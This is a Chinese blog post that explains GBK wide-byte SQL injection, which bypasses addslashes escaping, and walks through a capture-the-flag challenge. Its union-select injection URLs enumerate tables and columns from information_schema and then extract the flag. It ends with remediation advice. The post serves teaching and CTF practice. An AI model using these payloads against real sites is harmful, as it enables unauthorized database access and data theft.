美文网首页
sql注入-宽字节注入

sql注入-宽字节注入

作者: BuFFERer | 来源:发表于2020-01-31 12:15 被阅读0次

宽字节注入原理

当数据库编码方式为gdk时,一个汉字会占用两个字节,平常字符会占一个字节

例如: url编码之后为 => %c4%e3       # url编码之后为 => %23  ' url编码之后为 => %27  \ url编码之后为 => %5c

addslashes函数防止sql注入,将传入参数值进行转义。将' 转义为\',单引号失去作用,导致无法进行sql注入

这时可以利用汉字编码为2个,\ 的编码为%5c为1个将 \ 弄无效

实现

这里用南邮的一道题目来实现一下:

题目链接:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

url后面添加单引号,单引号前面有 \ 说明可能使用了addslashes函数

在单引号前随便添加一个,这里添加%aa,然后报错,说明可以注入

order by判断列数,可知一共2列,下面正常注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27 order by 2#

2是回显位,然后查看数据库,得到库名sae-chinalover

获取全部表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%aa%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查询表名找到flag字段(这里要将表名进行16进制编码)
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%aa%27 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634#

flag不唯一,这里随便找了一个

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%aa%27 union select 1,flag from ctf4#

修复方案

1.使用utf-8

2.mysql_real_escape_string,mysql_set_charset('gbk',$conn)

3.设置参数,character_set_client=binary

相关文章

  • sql注入 | 宽字节注入

    路漫漫其修远兮,吾将上下而求索。 mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%...

  • sql注入-宽字节注入

    宽字节注入原理 当数据库编码方式为gdk时,一个汉字会占用两个字节,平常字符会占一个字节 例如:你 url编码之后...

  • PHP宽字节注入

    在PHPMySql语句中存在着宽字节注入漏洞,MySQL宽字节注入漏洞是SQL注入漏洞攻防技术相互促进的一个典型例...

  • sql注入之宽字节注入

    宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码...

  • sql注入之宽字节注入

    0x00概述 宽字节注入主要源于程序员设置数据库编码与php编码设置为不同的两种编码,那么就可能产生宽字节注入 例...

  • SQL注入中宽字节注入

    获取错误方式 %df

  • SQL注入防御绕过——宽字节注入

    01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二...

  • sql注入

    [转载]sql宽字节注入详解 - lcamry - 博客园 1, admin' or 1=1 # 2, ' or...

  • Mysql注入-宽字节注入,二次编码注入

    宽字节注入 造成宽字节注入的原因,主要是因为使用了宽字节编码,导致一些字符被绕过 当我们注入 1' 时,若被转义成...

  • sql注入漏洞

    扫描结果是安全公司反馈回来的,有很多安全方面的漏洞,其中有sql注入,XSS注入,宽字节跨站漏洞,Javascri...

网友评论

      本文标题:sql注入-宽字节注入

      本文链接:https://www.haomeiwen.com/subject/lccmthtx.html